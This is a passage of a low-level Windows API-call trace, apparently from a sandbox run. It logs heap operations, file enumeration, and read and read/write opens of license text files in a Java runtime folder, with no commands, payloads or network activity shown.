[0098.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.062] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.062] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf9bd, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="THIRDPARTYLICENSEREADME-JAVAFX.txt", cAlternateFileName="THIRDP~1.TXT")) returned 1 [0098.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0098.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0098.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0098.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0098.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0098.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0098.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0098.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0098.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0098.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0098.063] AreFileApisANSI () returned 1 [0098.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt", lpUsedDefaultChar=0x0) returned 70 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0098.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0098.063] AreFileApisANSI () returned 1 [0098.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0098.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a5c8 [0098.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 70 [0098.064] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.064] GetFileType (hFile=0x27c) returned 0x1 [0098.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0098.064] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.064] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.064] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.065] CloseHandle (hObject=0x27c) returned 1 [0098.065] AreFileApisANSI () returned 1 [0098.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0098.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8ae18 [0098.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 70 [0098.065] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.065] GetFileType (hFile=0x27c) returned 0x1 [0098.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0098.065] CloseHandle (hObject=0x27c) returned 1 [0098.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0098.066] AreFileApisANSI () returned 1 [0098.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0098.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8aa88 [0098.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 70 [0098.066] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf9bd)) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0098.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.067] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.067] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2371c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="THIRDPARTYLICENSEREADME.txt", cAlternateFileName="THIRDP~2.TXT")) returned 1 [0098.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0098.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0098.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0098.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0098.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0098.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0098.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0098.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0098.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.067] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.067] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0098.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0098.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0098.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0098.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0098.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0098.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0098.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0098.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0098.068] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0098.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.068] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.069] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0098.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0098.070] AreFileApisANSI () returned 1 [0098.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt", lpUsedDefaultChar=0x0) returned 63 [0098.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0098.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0098.070] AreFileApisANSI () returned 1 [0098.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0098.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6dfa8 [0098.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 63 [0098.070] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.070] GetFileType (hFile=0x27c) returned 0x1 [0098.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0098.071] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.071] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.071] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.071] CloseHandle (hObject=0x27c) returned 1 [0098.071] AreFileApisANSI () returned 1 [0098.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0098.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6df20 [0098.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 63 [0098.071] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.071] GetFileType (hFile=0x27c) returned 0x1 [0098.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0098.072] CloseHandle (hObject=0x27c) returned 1 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0098.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0098.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0098.073] HeapFree (in: hHeap=0x20000, 